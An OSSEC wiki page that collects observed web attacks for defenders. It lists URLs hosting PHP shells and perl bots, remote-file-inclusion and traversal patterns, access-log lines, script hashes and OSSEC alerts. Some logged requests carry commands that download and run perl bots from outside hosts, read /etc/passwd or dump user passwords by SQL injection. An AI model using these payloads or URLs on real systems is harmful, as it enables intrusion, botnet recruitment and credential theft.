From OSSEC Wiki

Jump to: navigation, search

Contents

[edit]

List of sites known to have Malicious php/perl scripts

[edit]

Sites with PHP/Perl scripts

These are some of the sites that I have been collecting that have malicious php/perl
scripts used for web attacks (or related to trojans/worms).

Note: these sites may have malicious data. 

[PHP shell]
http://nicksom2d.sytes.net/ex/echo
http://www.thiaguinho.net/id.txt
http://nicksom2d.sytes.net/ex/echo
http://www.icaws.org/site//modules/Forums/admin/admin_forum
http://www.the-esao.com/imag/stringa.txt
http://paupal.info/folder/cmd1.gif
http://paupal.info/folder/mambo1.txt
http://xpls.my-place.us/57.txt
http://vegeta.co.jp/echo
http://www.gonfiabiligamespark.it/flash/r57.txt
http://l3to.by.ru/id.txt
http://efardella.cinet.it/claroline/phpbb/id.txt
http://www.freewebtown.com/sclipici/evilx
http://efardella.cinet.it/claroline/phpbb/id.txt
http://www.garotym.kit.net/cmd
http://koeh.t35.com/ptjz/root.gif
http://tw0team.name/leto/bn.txt
http://geocities.yahoo.com.br/google3089/cmd.html
http://tw0team.name/leto/kk.txt
http://legendlist.altervista.org/stringa.txt
http://usuarios.arnet.com.ar/larry123/id.txt
http://cristian-david.com/sphps/graba.txt
http://www.triton.xpg.com.br/id.txt
http://usuarios.lycos.es/poizonbox/r57.txt
http://www.visiontech-india.com/articles/images/logo2.jpg
http://mendesrs.bravehost.com/id.txt
http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt
http://intrusion.altervista.org/r0x/r0x/.../.../.../ddos.pl
http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt
http://rpgnet.com/newrpgnet/intranet/cmd.txt
http://www.mendes1.igotfree.com/id.txt
http://www.houthandelpolak.nl/images/yello/.xpl/lila.jpg
http://badmus.by.ru/id.txt
http://usuarios.arnet.com.ar/larry123/safe.txt
http://h1.ripway.com/outside/rootlab.jpg
http://www.l1nuxgroup.by.ru/id.txt
http://teste21.t35.com/cmd/tool25.dat
http://148.245.107.2/.ssh/id.txt
http://148.245.107.2/.ssh/sela.txt
http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????????
http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt
http://www.jungo8949.co.kr/tool25.txt
http://triangle-uiuc.org/attack/zero.txt
http://www.athleticbaby.com/public/templates_c/paged.gif
http://intrusion.hut2.ru/.../.../.../hh.txt
http://intrusion.hut2.ru/.../.../.../metodi.txt
http://71.102.93.10/WTS/bin/hak/idpitbull.txt
http://www.envio-web.com/speedy/echo.txt
http://www.onlinebusan.com/user_img/gmaw0121/id.txt
http://www.waldemarnowakowski.com/chat/data/id.txt
http://www.talesh.info/niaz/logold.jpg
http://creation.g-nova.fr/asprofirst/x
http://www.tukangbecak.com/ban.gif
http://tristatetuners.com/projectlist/q-mono/safe.txt
http://zeeob.com/nuke/files/q-mono/safe.txt
http://www.spycorp-labs.com/echo.txt
http://www2.ferred.cl/modules/q-mono/safe.txt
http://www.mk-design.com.tw/phpMyVisites/safe.txt
http://www.scupank.org/c.txt
http://www.l1nx.com/friends/photos/gay.txt
http://www.madkiwi.org/genealogy/genlog.txt
http://www.geschoir.org/lukman/id.txt
http://www.injecteds.org/r57.txt
http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt
http://www.digitalcrocker.org/..%20/safe
http://coisas.mxbr.com.br/h/rootlab.jpg
http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt
http://agatsuma.bestfreewebspace.net/safe3
http://www.jungo8949.co.kr/tool25.txt
http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt
http://madinaedu.gov.sa/id2.txt
http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt
http://www.visitesantacatarina.com.br/banner/safeon.txt
http://216.191.16.12/.shell/site/hai.txt
http://216.191.16.12/.shell/site/iyes.txt


[edit]

Common patterns (XSS)

/index2.php?x=<site>
/index.php?base_dir=<site>
/index.php?x=../../../../../../etc/passwd
/main.php?x=<site>
/error.php?dir=<site>
/main.inc&G_PATH=<site>
/htmltonuke.php?filnavn=<site>
/upgrade_album.php?GALLERY_BASEDIR=<site>
&mosConfig_absolute_path=<site>
/admin.php?cal_dir=<site>
/lib.inc.php?pm_path=<site>
/mainfile.php?MAIN_PATH=<site>
/contacts.php?cal_dir=<site>
/include.php?gorumDir=<site>
/step_one_tables.php?server_inc=<site>
/viewgantt.php?root_dir=<site>
/index.php?site=<site>
/index.php?content=<site>
/index.php?content=<any file>
/index.php?visualizar=<site>
/addevent.inc.php?agendax_path=<site>
/displayCategory.php?adminpath=<site>
/theme.php?THEME_DIR=<site>
/vw_usr_roles.php?baseDir=<site>
/initdb.php?absolute_path=<site>
/header.inc.php?serverPath=<site>
/start_lobby.php?CONFIG[MWCHAT_Libs]=<site>
/auth.php?path=<site>
.php?serverPath=<site>
onMouseOver=%22window.status='<site>
/index.php?arquivo=
/linkpoint.inc.php?config[root_dir]=<site>
/editsite.php?returnpath=<site>
/admin_xs.php?phpEx=/../../../../../../../../<file>%00
/db_connect.php?baseDir=<site>
/index.php?includeFooter=<site>
/addentry.php?phpbb_root_path=<site>
/addevent.inc.php?agendax_path=<location>
/index.php?AMG_open=comments&AMG_id=<sql_injection>
.php?dir=<site> (from setup.php?dir= print_category.php?dir= ask_password.php?dir=)
/db.php?path_local=<site>     -- PHP Loja Facil - [[http://www.milw0rm.com/exploits/3875]]


[edit]

Dump of Web attack scripts

  • RFI Vulnerability scanner -
  • c99shell -
  • cmdphp_shell -
  • ShellBOT - http:// triangle-uiuc.org/attack/zero.txt
  • no.txt - http:// intrusion.altervista.org/r0x/r0x/.../.../.../no.txt
  • ddos.pl - http:// intrusion.altervista.org/r0x/r0x/.../.../.../ddos.pl
  • lila.jpg - http:// www.houthandelpolak.nl/images/yello/.xpl/lila.jpg
  • safe.txt - http:// usuarios.arnet.com.ar/larry123/safe.txt
  • id.txt - perlbot fetcher - http:// 148.245.107.2/.ssh/id.txt
  • sela.txt - perlbot - http:// 148.245.107.2/.ssh/sela.txt
  • asc - http:// wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????????
  • mic22 - http:// www.envio-web.com/speedy/echo.txt


[edit]

Broken scripts

  • Look at G_PATH=YOURCMD: 
65.98.14.194 - - [03/Oct/2007:15:47:25 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=YOURCMD? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"


[edit]

Worm/Virus sites

[Sober trojan]
home.arcor.de
scifi.pages.at
home.pages.at
free.pages.at
people.freenet.de

[Hotword trojan]
ftp.targetdata.biz
ftp.alrobertspublishing.com
bp007.no-ip.com

[Warg Bot]
media.pixpond.com/l9rd


[edit]

Full URLs

87.106.75.16 - - [12/Jul/2007:12:48:32 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"

213.251.187.110 - - [10/Jul/2007:05:00:57 -0300] "GET /dcid/install/index.php?lng=../../include/main.inc&G_PATH=http://legendlist.altervista.org/stringa.txt? HTTP/1.1" 200 6359 "-" "libwww-perl/5.803"

212.68.197.6 - - [10/Jul/2007:14:29:20 -0300] "GET //index.php?link=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/x/bn.txt;wget%20http://tw0team.name/x/bn.txt;fetch%20http://tw0team.name/x/bn.txt;curl%20-O%20http://tw0team.name/x/bn.txt;perl%20bn.txt;rm%20-rf%20bn*? HTTP/1.1" 200 6235 "-" "libwww-perl/5.76"

216.120.227.52 - - [18/Jul/2007:07:55:43 -0300] "GET /dcid/*install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"

212.184.187.186 - - [17/Jul/2007:17:28:19 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.63"

208.116.38.148 - - [17/Jul/2007:18:31:13 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.79"

201.17.129.24 - - [22/Jul/2007:21:46:26 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.lycos.es/poizonbox/r57.txt?? HTTP/1.1" 200 6349 "-" "libwww-perl/5.803"

69.64.37.77 - - [21/Jul/2007:16:51:25 -0300] "GET /wiki/index.php?title=Samples_of_attac...ed_by_ossec&printable=yes/install/index.php?lng=../../include/main.inc&G_PATH=http://www.visiontech-india.com/articles/images/logo2.jpg? HTTP/1.1" 200 7063 "-" "libwww-perl/5.79"

62.141.39.43 - - [26/Jul/2007:10:14:16 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=http://mendesrs.bravehost.com/id.txt? HTTP/1.1" 200 6933 "-" "libwww-perl/5.76"

85.12.31.79 - - [26/Jul/2007:18:13:09 -0300] "GET /wiki/index.php/WebAttacks_links//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7197 "-" "libwww-perl/5.806"

216.120.237.150 - - [26/Jul/2007:19:37:43 -0300] "GET //skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 6235 "-" "libwww-perl/5.806"

66.156.76.235 - - [27/Jul/2007:00:12:18 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7280 "-" "libwww-perl/5.76"

216.120.237.150 - - [28/Jul/2007:22:38:12 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7010 "-" "libwww-perl/5.806"

62.210.190.242 - - [28/Jul/2007:20:16:23 -0300] "GET /wiki/index.php?title=Index.php&printable=yes/*install/index.php?lng=../../include/main.inc&G_PATH=http://guilde-wow.nuxit.net/main? HTTP/1.1" 200 6762 "-" "libwww-perl/5.803"

216.200.125.254 - - [31/Jul/2007:22:01:12 -0300] "GET /htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6291 "-" "libwww-perl/5.75"

216.200.125.254 - - [31/Jul/2007:22:16:20 -0300] "GET /wiki/index.php/htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6884 "-" "libwww-perl/5.75"

216.200.125.254 - - [01/Aug/2007:11:12:28 -0300] "GET /wiki/index.php//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 7120 "-" "libwww-perl/5.75"

69.14.231.114 - - [01/Aug/2007:18:32:00 -0300] "GET /wiki/index.php/main.php?x=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt? HTTP/1.1" 200 6834 "-" "libwww-perl/5.79"

69.14.231.114 - - [01/Aug/2007:22:26:47 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/default.php?page=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt? HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"

86.109.164.220 - - [07/Aug/2007:15:01:59 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?p=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 500 607 "-" "libwww-perl/5.79"

74.53.90.130 - - [07/Aug/2007:15:37:44 -0300] "GET /main.php?x=http://ankerz.phpnet.us/Qe3? HTTP/1.1" 500 607 "-" "libwww-perl/5.808"

209.216.253.180 - - [15/Aug/2007:15:47:04 -0300] "GET /dcid/?p=6/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 200 11307 "-" "libwww-perl/5.65"

72.22.90.110 - - [15/Aug/2007:03:31:09 -0300] "GET /wiki/index.php/main.php?page=uid=10004(unix)%20gid=10004(unix)%20groups=10004(unix)%0A? HTTP/1.1" 200 6440 "-" "libwww-perl/5.803"

217.160.21.98 - - [14/Aug/2007:19:55:18 -0300] "GET /wiki/index.php/RFI_%3Cwbr%20/%3EVulnerability_scanner//skin/zero_vote/error.php?dir=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 200 6117 "-" "libwww-perl/5.803"

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"

218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"

202.67.153.151 - - [26/Aug/2007:21:55:23 -0300] "GET /wiki/admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"

202.67.153.151 - - [26/Aug/2007:21:55:22 -0300] "GET /admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"

202.67.153.151 - - [28/Aug/2007:20:48:40 -0300] "GET /wiki/modules/tasks/viewgantt.php?root_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"

212.59.7.10 - - [29/Aug/2007:09:37:44 -0300] "GET /wiki/index.php/WebAttacks_links/index.php?lng=../../include/main.inc&G_PATH=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 200 6638 "-" "libwww-perl/5.65"

82.165.33.50 - - [05/Sep/2007:11:44:12 -0300] "GET /main.php?x=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 269 "-" "libwww-perl/5.69"

204.10.70.1 - - [07/Sep/2007:15:54:13 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.65"

206.176.210.52 - - [07/Sep/2007:14:21:22 -0300] "GET /wiki/index.php/index.php?site=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20*;cd%20/tmp;lwp-download%20http://triangle-uiuc.org/attack/zero.txt;fetch%20http://triangle-uiuc.org/attack/zero.txt;curl%20-o%20zero.txt%20http://triangle-uiuc.org/attack/zero.txt;wget%20http://triangle-uiuc.org/attack/zero.txt;perl%20zero.txt? HTTP/1.1" 200 6272 "-" "libwww-perl/5.65"

128.241.236.252 - - [09/Sep/2007:13:16:29 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"

128.241.236.252 - - [09/Sep/2007:13:28:33 -0300] "GET /wiki/index.php/OSSECWUI:Install/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6726 "-" "libwww-perl/5.808"

209.240.96.35 - - [17/Sep/2007:13:51:52 -0300] "GET /wiki/index.php?content=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"

200.142.86.12 - - [14/Sep/2007:12:36:42 -0300] "GET /wiki/index.php//modules/agendax/addevent.inc.php?agendax_path=http://intrusion.hut2.ru/.../.../.../metodi.txt?? HTTP/1.1" 200 6704 "-" "libwww-perl/5.65"

81.169.128.26 - - [03/Oct/2007:03:44:22 -0300] "GET /wiki/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.69"

210.114.220.92 - - [04/Oct/2007:00:29:38 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.79"

202.133.244.140 - - [18/Sep/2007:17:08:46 -0300] "GET /wiki/index.php//hpgprojects/modules/admin/vw_usr_roles.php?baseDir='http://www.mk-design.com.tw/phpMyVisites/safe.txt? HTTP/1.1" 200 6814 "-" "libwww-perl/5.79"

69.72.144.66 - - [12/Oct/2007:02:09:24 -0300] "GET /wiki/calendar/events/header.inc.php?serverPath=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"

211.233.6.126 - - [13/Oct/2007:02:59:25 -0300] "GET /main.php?x=http://www.digitalcrocker.org/..%20/safe? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"

207.58.166.142 - - [15/Oct/2007:12:47:45 -0200] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://coisas.mxbr.com.br/h/rootlab.jpg?? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"

209.62.7.50 - - [14/Oct/2007:15:02:01 -0200] "GET /ossec-list/index2.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"

85.13.133.246 - - [13/Oct/2007:20:59:27 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?page=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20foi*;wget%20http://infos157.t35.com/foi.txt;cd%20/tmp;lwp-download%20http://infos157.t35.com/foi.txt;cd%20/tmp;fetch%20http://infos157.t35.com/foi.txt;cd%20/tmp;curl%20-o%20foi.txt%20http://infos157.t35.com/foi.txt;cd%20/tmp;GET%20http://infos157.t35.com/foi.txt;cd%20/tmp;lynx%20-source%20http://infos157.t35.com/foi.txt;cd%20/tmp;perl%20foi.txt;rm%20-rf%20foi.txt*? HTTP/1.1" 200 6721 "-" "libwww-perl/5.65"re>

87.106.11.23 - - [21/Apr/2008:10:47:13 -0300] "GET /wiki/index.php/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20,user_name,user_password,user_email)1'AND%201=1/* HTTP/1.1" 200 6381 "-" "libwww-perl/5.803"

===MD5sum of web exploits===


Just a list of md5 checkums of tools/scritps I have being collecting:


<pre>
ac2d86274c237347746d100a74c98868
6ca575aa6e202c511fc3751ac833b931
d9faa6331644cc58a562ce04ab69dd46
db6b29c6644627c727190cdcc639765a
a42953bad0e0a9cb261ea8e29622481b
6a797404da403b219729c17dcd5cbcc1
3a900dff6ceac1f126d7d1d057f226a6
84a4c42ab78a5101d4ccd45302d77da0
2dc580046881289c6c061b9282fad9c8
d133dfda19beef529eed9d11e213a123
52c619a9d6e4079a8493ec6e2c4e0ef2
fd3c2a49fe6359b9073e1b54c5071f06
3ab294c6e48cc8bad2bcb066d2dc9985
48b3bd9fd9a7bdc36245afecbbe8d9b2
93b8be9f4c0d4bf8e8f063243f093dc2
ede8ad5d34499081f1358d22f331a62f
e454f994ad96271991bc8b402bce906e
ede8ad5d34499081f1358d22f331a62f
12b101965a4557cc876e78fcaf410f90
3793bcc32bd9cb46072bfc54d81708c2
2a1f293878fbcd048e443660ba29010d
08a2c6bd80eeee6dfd0e17d67c10015e
3921f2974e8c636863f60c39bba53533
723bd668815ab2081748ed6b80028f5a
3793bcc32bd9cb46072bfc54d81708c2
dfa7552638e2db710fea9ceb8c17b4f8


[edit]

OSSEC alerts for web attacks

[edit]

Simple Scan looking for multiple vulnerabilities

OSSEC HIDS Notification.
2007 Aug 27 20:07:47

Received From: teletubbies->/var/log/httpd/ossec.access.log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:01 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:00 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:59 -0300] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:37 -0300] "GET /ossec-list/2007-April/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:32 -0300] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:31 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:20 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:06:16 -0300] "GET /wiki/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
[edit]

Scan looking for vulnerable applications

OSSEC HIDS Notification.
2007 Oct 06 07:19:31

Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

91.121.27.102 - - [06/Oct/2007:07:19:30 -0300] "GET /phpMyChat-0.14.4//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.5//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /phpMyChat-0.14.2//chat/messagesL.php3 HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:26 -0300] "GET /php/phpmychat//chat/messagesL.php3 HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /forum//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chats//chat/messagesL.php3 HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /chatroom//chat/messagesL.php3 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:25 -0300] "GET /PhpMyChat//chat/messagesL.php3 HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:07:19:24 -0300] "GET /phpchat//chat/messagesL.php3 HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



 --END OF NOTIFICATION


SSEC HIDS Notification.
2007 Oct 06 08:06:55

Received From: teletubbies->/var/log/httpd/access_log
Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
Portion of the log(s):

91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //blogs/xmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //community/xmlrpc.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:54 -0300] "GET //drupal/xmlrpc.php HTTP/1.1" 404 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:42 -0300] "GET //phpadsnew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpAdsNew2/adxmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //Ads/adxmlrpc.php HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:41 -0300] "GET //phpads/adxmlrpc.php HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpadsnew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.121.27.102 - - [06/Oct/2007:08:06:40 -0300] "GET //phpAdsNew/adxmlrpc.php HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"



 --END OF NOTIFICATION
Retrieved from "http://www.ossec.net/wiki/index.php/WebAttacks_links"
Views
Personal tools